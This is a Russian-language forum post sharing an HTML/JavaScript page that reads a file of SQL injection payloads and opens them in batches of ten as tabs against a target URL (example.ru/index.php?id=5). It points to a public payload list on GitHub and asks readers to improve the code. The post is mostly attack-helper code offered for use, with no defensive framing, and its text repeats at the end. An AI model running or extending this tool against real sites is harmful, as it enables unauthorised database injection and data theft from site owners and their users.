Скрипт для обхода сайта руками на наличие SQL уязвимостей
Необходимо загрузить список пейлод в формате .txt
https://github.com/payloadbox/sql-injection-payload-list
ВОт старт, кто может улучшить/дополнить код плс в коментарии..
HTML:
<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
<meta charset="utf-8">
<title>asdasd</title>
</head>
<body>
<input id="input" type="file" onchange="readFile(this)">
<button id="button">push 10url</button>
<div id="demo">0</div>
</body>
<script defer type="text/javascript">
let arrx = []
let num = 0
const input = document.getElementById('input')
const button = document.getElementById('button')
const count = document.getElementById("demo")
function readFile(input) {
let file = input.files[0];
let reader = new FileReader();
reader.readAsText(file);
reader.onload = function() {
arrx = reader.result.split('\n')
};
}
button.addEventListener("click",() => {
let start = arrx.slice(num, num + 10)
num += 10
const url = "https://example.ru";
const uri = "index.php?id=5"
for (let inj of start) {
window.open(`${url}/${uri}${inj}`)
}
count.innerHTML = num
})
</script>
</html>Необходимо загрузить список пейлод в формате .txt
https://github.com/payloadbox/sql-injection-payload-list
ВОт старт, кто может улучшить/дополнить код плс в коментарии..
Последнее редактирование: